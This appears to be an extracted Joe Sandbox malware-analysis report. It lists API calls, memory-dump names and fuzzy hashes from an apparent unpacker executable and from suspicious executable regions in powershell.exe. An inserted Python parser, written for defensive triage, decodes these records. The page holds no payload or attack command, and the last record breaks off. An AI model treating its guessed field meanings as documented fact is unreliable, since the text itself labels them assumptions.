• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: ObjectRelease$CapsDevice
• String ID: (
• API String ID: 1061551593-3887548279
APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: _swprintf
• String ID: %ls$%s: %s
• API String ID: 589789837-2259941744
APIs
• __EH_prolog.LIBCMT ref: 00FD7575
• SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00FD7711
  • Part of subcall function 00FDA12F: SetFileAttributesW.KERNEL32(?,00000000,00000001,?,00FD9F65,?,?,?,00FD9DFE,?,00000001,00000000,?,?), ref: 00FDA143
  • Part of subcall function 00FDA12F: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00FD9F65,?,?,?,00FD9DFE,?,00000001,00000000,?,?), ref: 00FDA174
Strings
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: File$Attributes$H_prologTime
• String ID: :
• API String ID: 1861295151-336475711
Strings
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID:
• String ID: UNC$\\?\
• API String ID: 0-253988292
APIs
• WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00FFEA9F,00000000,00000000,00000000,00000000,00000000,00FF3FBF), ref: 00FFE70C
• GetLastError.KERNEL32(?,00FFEA9F,00000000,00000000,00000000,00000000,00000000,00FF3FBF,00000000,00FF3FBF,0100AA70,00000010,00FFD947,00000000,0100A9E8,00000010), ref: 00FFE735
Strings
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID: 6P+
• API String ID: 442123175-3080146196
APIs
• WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00FFEABF,00000000,00000000,00000000,00000000,00000000,00FF3FBF), ref: 00FFE61E
• GetLastError.KERNEL32(?,00FFEABF,00000000,00000000,00000000,00000000,00000000,00FF3FBF,00000000,00FF3FBF,0100AA70,00000010,00FFD947,00000000,0100A9E8,00000010), ref: 00FFE647
Strings
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID: 6P+
• API String ID: 442123175-3080146196
APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID:
• String ID: Shell.Explorer$about:blank
• API String ID: 0-874089819
APIs
• IsWindowVisible.USER32(000304CA), ref: 00FECA6D
• DialogBoxParamW.USER32(GETPASSWORD1,000304CA,00FEA0B0,?,?), ref: 00FECAA9
Strings
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: DialogParamVisibleWindow
• String ID: GETPASSWORD1
• API String ID: 3157717868-3292211884
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00FEE82E
• ___raise_securityfailure.LIBCMT ref: 00FEE915
Strings
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: FeaturePresentProcessor___raise_securityfailure
• String ID: 6P+
• API String ID: 3761405300-3080146196
APIs
  • Part of subcall function 00FDD70B: _swprintf.LIBCMT ref: 00FDD731
  • Part of subcall function 00FDD70B: _strlen.LIBCMT ref: 00FDD752
  • Part of subcall function 00FDD70B: SetDlgItemTextW.USER32(?,0100D154,?), ref: 00FDD7B2
  • Part of subcall function 00FDD70B: GetWindowRect.USER32(?,?), ref: 00FDD7EC
  • Part of subcall function 00FDD70B: GetClientRect.USER32(?,?), ref: 00FDD7F8
• GetDlgItem.USER32(00000000,00003021), ref: 00FD131B
• SetWindowTextW.USER32(00000000,010022E4), ref: 00FD1331
Strings
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: ItemRectTextWindow$Client_strlen_swprintf
• String ID: 0
• API String ID: 2622349952-4108050209
APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: Free
• String ID: 6P+$FlsFree
• API String ID: 3978063606-1299238597
APIs
• WaitForSingleObject.KERNEL32(?,000000FF,00FE05D9,?,?,00FE064E,?,?,?,?,?,00FE0638), ref: 00FE04C0
• GetLastError.KERNEL32(?,?,00FE064E,?,?,?,?,?,00FE0638), ref: 00FE04CC
  • Part of subcall function 00FD6CCE: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FD6CEC
Strings
• WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00FE04D5
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: ErrorLastObjectSingleWait__vswprintf_c_l
• String ID: WaitForMultipleObjects error %d, GetLastError %d
• API String ID: 1091760877-2248577382
                                                                                                                                                                            • Opcode ID: 85fa7adb38a599aa55427cca2aa91e6ba2bbf2718f175bd8c9f882a4e75911a4
                                                                                                                                                                            • Instruction ID: 3037b4647e7fafba64e85ec39cac13ce3e4f776b2114f581987ad352ad9b51e9
                                                                                                                                                                            • Opcode Fuzzy Hash: 85fa7adb38a599aa55427cca2aa91e6ba2bbf2718f175bd8c9f882a4e75911a4
                                                                                                                                                                            • Instruction Fuzzy Hash: 29D02E3180813127DA126324AC0EEAE38078B22330F258B1DF2B5A43EECE290CC092D1
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,00FDCFBE,?), ref: 00FDD6C6
                                                                                                                                                                            • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00FDCFBE,?), ref: 00FDD6D4
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FindHandleModuleResource
                                                                                                                                                                            • String ID: RTL
                                                                                                                                                                            • API String ID: 3537982541-834975271
                                                                                                                                                                            • Opcode ID: 9ea1da3842997f472352c350b7d94c31ad9d32ac897b5328af09efbc0ebc4099
                                                                                                                                                                            • Instruction ID: 9df10a6fc664b9a24618dc2c6b780703c4093e61d6ad242ade5b485dcf1355ed
                                                                                                                                                                            • Opcode Fuzzy Hash: 9ea1da3842997f472352c350b7d94c31ad9d32ac897b5328af09efbc0ebc4099
                                                                                                                                                                            • Instruction Fuzzy Hash: A5C0123168131266EB325B316C0DF832A4A6B04B22F190449B2C5DA2C5DEAAC844C7A0
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2324755369.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_7680000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: $a%k$$a%k$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$pipj$pipj$pipj$pipj$pipj$tP^q$tP^q$tP^q$tP^q$tP^q$tP^q$|,rj$$^q$$^q$$^q
                                                                                                                                                                            • API String ID: 0-636322440
                                                                                                                                                                            • Opcode ID: fc33ebb0b9ac7311dca17b8a81ae94f899daf7ed5aadc8443d31b2e508f6bd17
                                                                                                                                                                            • Instruction ID: 9278dc0d24b838f16fc3a26704f671364845608186fe711a928c8af9245d8dda
                                                                                                                                                                            • Opcode Fuzzy Hash: fc33ebb0b9ac7311dca17b8a81ae94f899daf7ed5aadc8443d31b2e508f6bd17
                                                                                                                                                                            • Instruction Fuzzy Hash: 97C258B1B003069FCB65AB79D8207AABBE6BF85710F14826AD506CF351DF35C885C7A1
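The records in this section all follow one layout (optional APIs and Strings lists, then the Memory Dump Source, Joe Sandbox IDA Plugin and Similarity blocks, closed by the Instruction Fuzzy Hash line), so a responder can parse them instead of reading thousands of lines. The Python below is an added example, not Joe Sandbox code and not part of this report: parse_records() splits the text into records, API_RE pulls out the resolved calls with their ref addresses, and decode_sdmp_name() breaks the .sdmp file name into its eight fields. Of those fields, the first, second and fourth (process ID, run and region address, all hex) are confirmed by the page itself, because the dump at 0000000000FD1000 belongs to snapshot hcaresult_16_2_fd0000, i.e. PID 0x10, run 2. Reading the fifth field as the region's PAGE_* protection and the seventh as its MEM_* allocation type is an assumption made here: it agrees with every record on the page (0x20 on the image's code region, 0x1000000 wherever "based on PE: true", 0x40 and 0x20000 on the powershell.exe dumps) but is not documented on it, and fields 3, 6 and 8 are left undecoded. SAMPLE is two records copied from above, abridged, with one "Download File" link label left in as the extractor produced it.

```python
"""Parse Joe Sandbox function-detail records (added example, not Joe Sandbox code).

SAMPLE is two records copied from this page, abridged, as extracted (one "Download File"
link label left in).  Reading .sdmp name fields 5 and 7 as PAGE_* / MEM_* values is an
assumption made here; see DumpSource."""
import re
from dataclasses import dataclass, field

PAGE_PROTECTION = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                   0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
SDMP_RE = re.compile(r"^" + r"\.".join([r"([0-9A-Fa-f]+)"] * 8) + r"\.sdmp$")   # 8 hex fields
API_RE = re.compile(r"^•\s*(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)$")
SOURCE_RE = re.compile(r"^•\s*Source File:\s*(\S+),\s*Offset:\s*[0-9A-Fa-f]+,\s*based on PE:\s*(true|false)$")
FIELD_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")
HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

@dataclass
class DumpSource:
    # Fields 1, 2 and 4 are confirmed by the page: dump ...0000000000FD1000... belongs to snapshot
    # hcaresult_16_2_fd0000, i.e. PID 0x10, run 2, region 0xFD0000.  Fields 5 and 7 are ASSUMED to
    # be the region's PAGE_* protection and MEM_* type; every record on the page is consistent.
    pid: int
    run: int
    base: int
    protection: int
    mem_type: int
    def protection_name(self): return PAGE_PROTECTION.get(self.protection, hex(self.protection))
    def mem_type_name(self): return MEM_TYPE.get(self.mem_type, hex(self.mem_type))

def decode_sdmp_name(name):
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox dump name: {name}")
    pid, run, _f3, base, prot, _f6, mtype, _f8 = m.groups()   # fields 3, 6, 8 left undecoded
    return DumpSource(int(pid, 16), int(run, 16), int(base, 16), int(prot, 16), int(mtype, 16))

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)    # (function, module, args, ref address)
    source_file: str = ""
    based_on_pe: bool = False
    fields: dict = field(default_factory=dict)  # every other "• key: value" line, values as lists
    def dump(self): return decode_sdmp_name(self.source_file) if self.source_file else None

def parse_records(text):
    """Split report text into records; a complete record ends at its Instruction Fuzzy Hash."""
    records, cur, section = [], FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip()                      # the extracted page carries deep indentation
        if line in HEADERS:
            section = line
        elif section == "APIs" and (m := API_RE.match(line)):
            cur.apis.append((m.group(1), m.group(2), m.group(3), int(m.group(4), 16)))
        elif section == "Strings" and line.startswith("•"):
            cur.fields.setdefault("Strings", []).append(line[1:].strip())
        elif m := SOURCE_RE.match(line):
            cur.source_file, cur.based_on_pe = m.group(1), m.group(2) == "true"
        elif m := FIELD_RE.match(line):
            key, val = m.group(1).strip(), m.group(2).strip().removesuffix("Download File")
            cur.fields.setdefault(key, []).append(val)
            if key == "Instruction Fuzzy Hash":  # last line of every complete record
                records.append(cur)
                cur, section = FunctionRecord(), None
    if cur.source_file or cur.apis:             # final record cut off by page truncation
        records.append(cur)
    return records

def executable_private_regions(records):
    """Dumps of executable private (non-image) memory.  Triage cue only: .NET JIT in
    powershell.exe allocates RWX private pages too, but so does injected code."""
    return [r for r in records
            if (d := r.dump()) and d.mem_type == 0x20000 and d.protection in (0x20, 0x40)]

SAMPLE = """\
APIs
• GetModuleHandleW.KERNEL32(00000000,?,00FDCFBE,?), ref: 00FDD6C6
• FindResourceW.KERNEL32(00000000,RTL,00000005,?,00FDCFBE,?), ref: 00FDD6D4
Strings
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: FindHandleModuleResource
• String ID: RTL
• Instruction Fuzzy Hash: A5C0123168131266EB325B316C0DF832A4A6B04B22F190449B2C5DA2C5DEAAC844C7A0
Strings
Memory Dump Source
• Source File: 00000011.00000002.2324755369.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7680000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'^q$4'^q$4'^q$4'^q
• Instruction Fuzzy Hash: 071222B1B043468FCB65AB79980076BBFA6AF81710F24817AD5468F351DF36C882C7A1
"""
```

executable_private_regions() is a triage cue rather than a verdict: powershell.exe's .NET runtime JIT-compiles into RWX private pages, so such dumps are expected in that process, but injected code lives in the same kind of region, and in this report those records carry no resolved API references and only short garbage strings, which says nothing until the code is looked at. The .jbxd snapshot named in each record is what the Joe Sandbox IDA plugin loads, so those are the dumps to open first.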
Memory Dump Source
• Source File: 00000011.00000002.2313346183.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_48c0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3be447b572f46b56cce6f52f092d7eaf2d30f5245bcad96360a90cf0cdef6bef
• Instruction ID: cde91a8daf7f8d6dfabf80deec14062faf6a223958eb0b9fbca2458375b063f1
• Opcode Fuzzy Hash: 3be447b572f46b56cce6f52f092d7eaf2d30f5245bcad96360a90cf0cdef6bef
• Instruction Fuzzy Hash: FD91A571F006195BDB1AEFB4C5145AEB7A3DF84708B04892DD24AAB350DF74AD0ACBC6
Memory Dump Source
• Source File: 00000011.00000002.2313346183.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_48c0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b53fc2f890e731e68f583f73045f69297e0d24eda07aaab55a237b002f587a27
• Instruction ID: 7c63af0875040ac904b0f1f50143327cb10d0efc7b2c7fff7045567bf758851b
• Opcode Fuzzy Hash: b53fc2f890e731e68f583f73045f69297e0d24eda07aaab55a237b002f587a27
• Instruction Fuzzy Hash: 92919771F006195BDB19EFB4C5145AEB7E3DF84708B00892DD24AAB354DF74AD0A8BC6
Strings
Memory Dump Source
• Source File: 00000011.00000002.2324755369.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7680000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'^q$4'^q$4'^q$4'^q
• API String ID: 0-1420252700
• Opcode ID: f994ffafc034b4cd03a07b9aafd61060d561f61dcb5e2ae576bc2b30e47a0f0e
• Instruction ID: 4c71aa5b09538e7ad25ef1f4e1b513abb2c64096c1c4553287e94fab3fdb2c52
• Opcode Fuzzy Hash: f994ffafc034b4cd03a07b9aafd61060d561f61dcb5e2ae576bc2b30e47a0f0e
• Instruction Fuzzy Hash: 071222B1B043468FCB65AB79980076BBFA6AF81710F24817AD5468F351DF36C882C7A1
Strings
Memory Dump Source
• Source File: 00000011.00000002.2313346183.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_48c0000_powershell.jbxd
Similarity
• API ID:
• String ID: (bq
• API String ID: 0-149360118
• Opcode ID: faea30b9504c2f9d062f284b266a3ff3796643af4d9219e1bd8ed0d550f771fc
• Instruction ID: b18a13ac288d8261404c3f812cb5d0de9a1c42bb2d9bc5c9d2662e674006be99
• Opcode Fuzzy Hash: faea30b9504c2f9d062f284b266a3ff3796643af4d9219e1bd8ed0d550f771fc
• Instruction Fuzzy Hash: 5D415934B042098FDB14DF68C954AADBBF2EF89311F2484A9E406EB391DA35EC01CF61
Strings
Memory Dump Source
• Source File: 00000011.00000002.2313346183.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_48c0000_powershell.jbxd
Similarity
• API ID:
• String ID: pipj
• API String ID: 0-2401599135
• Opcode ID: c2a4b4698e4e62d0b7fb19c71289f484dcb815a59973b077d3de92063763c6f4
• Instruction ID: 9abebb3522fbf9798fcb1b595ce20c54cc7beaa1e5725a5e7f5474f45622b901
• Opcode Fuzzy Hash: c2a4b4698e4e62d0b7fb19c71289f484dcb815a59973b077d3de92063763c6f4
• Instruction Fuzzy Hash: C5417C30A012458FCB11DF78D954A9EBBF2EF89204F148569D446EB3A2CB34AC49CBA0
Strings
Memory Dump Source
• Source File: 00000011.00000002.2313346183.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_48c0000_powershell.jbxd
Similarity
• API ID:
• String ID: pipj
• API String ID: 0-2401599135
• Opcode ID: b00a6f5d27f8ada6c2f7434d8a8b8634dee49826f898ab44a2b985a9dfd86c63
• Instruction ID: c07cba8c88d362b0d977647653aea985a043378228573238e3f0c65904be92b0
• Opcode Fuzzy Hash: b00a6f5d27f8ada6c2f7434d8a8b8634dee49826f898ab44a2b985a9dfd86c63
• Instruction Fuzzy Hash: 70314B30A00605DFCB15DF69DA54A9EBBF2FF88304F108A29D416E7395DB34AD49CB90
Strings
Memory Dump Source
• Source File: 00000011.00000002.2313346183.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_48c0000_powershell.jbxd
Similarity
• API ID:
• String ID: (&^q
• API String ID: 0-2067289071
• Opcode ID: b5e0fd6d08b3ebb7fd8efdb39e32eda207ca70d0e4b21843b2365326c33904fc
• Instruction ID: 4e59313f812444336ecfd0e331026381dc0bbd9f64e5e9b798197377e03108c6
• Opcode Fuzzy Hash: b5e0fd6d08b3ebb7fd8efdb39e32eda207ca70d0e4b21843b2365326c33904fc
• Instruction Fuzzy Hash: AF21AE75A042588FCB14DFAED80479EBFF5EB88320F14886ED458E7350DA75A805CFA5
Memory Dump Source
• Source File: 00000011.00000002.2313346183.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_48c0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f9b84308aa076db16d560e302ce10552e51f26ca75fd634f5b2258f0fc03bb36
• Instruction ID: c6093cb6cb9690a0e455607724cfa6ef74a5c85f07a0e03be5d89b822a71f468
• Opcode Fuzzy Hash: f9b84308aa076db16d560e302ce10552e51f26ca75fd634f5b2258f0fc03bb36
• Instruction Fuzzy Hash: 33915C74A006498FCB15CF59C4949AEFBB1FF48310B248AA9E855EB3A5C735FC91CB90
Memory Dump Source
• Source File: 00000011.00000002.2324755369.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7680000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6f4cf44ebf9753034d5aec0c010c36a9dc7c04081c81f29beed67375a7e353a3
• Instruction ID: 7dac24052bfb8fd67b13ef3fcf5e363fd4a0ce19bf51044b04aff1ea1de28ba7
• Opcode Fuzzy Hash: 6f4cf44ebf9753034d5aec0c010c36a9dc7c04081c81f29beed67375a7e353a3
                                                                                                                                                                            • Instruction Fuzzy Hash: A8514DB170434A9FCB58AB79D4006A6BFE2AF87210F1881AFD506CF352DA35CD56C3A1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2313346183.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_48c0000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 13ce4a0a2cf0659c9c81f55c22c488d12b7d298a3f2f97ce1e3e21453b30f090
                                                                                                                                                                            • Instruction ID: 91bafa54cb60f974a02bd61655f7d4ab83c4d66f927316800abc8708b3c55514
                                                                                                                                                                            • Opcode Fuzzy Hash: 13ce4a0a2cf0659c9c81f55c22c488d12b7d298a3f2f97ce1e3e21453b30f090
                                                                                                                                                                            • Instruction Fuzzy Hash: F2611671E002488FCB14DFA9D584A9DFBF2FF88310F14856AE919AB365EB34AC45CB50
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2313346183.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_48c0000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 0482d993381371f115fe733c81163bd0186f290067f3253c8c4533b057a622d5
                                                                                                                                                                            • Instruction ID: 69878af63ac23c9c17a8fcf6e12352cb560d5b5e2c3799115610879c6ef0986e
                                                                                                                                                                            • Opcode Fuzzy Hash: 0482d993381371f115fe733c81163bd0186f290067f3253c8c4533b057a622d5
                                                                                                                                                                            • Instruction Fuzzy Hash: 65518C353002069FD704AB69D844A2ABBEAFFC8354F14896EE609CB351EB35EC01CB91
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2313346183.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_48c0000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 53c4172bb101de0ae9a8a7bbb6001e531d0db9c0c31b78355c89d54aa8108acf
                                                                                                                                                                            • Instruction ID: c18817e75bd84b0a49720bf9d8470134867d0b21ca877189e1870f76eb5418de
                                                                                                                                                                            • Opcode Fuzzy Hash: 53c4172bb101de0ae9a8a7bbb6001e531d0db9c0c31b78355c89d54aa8108acf
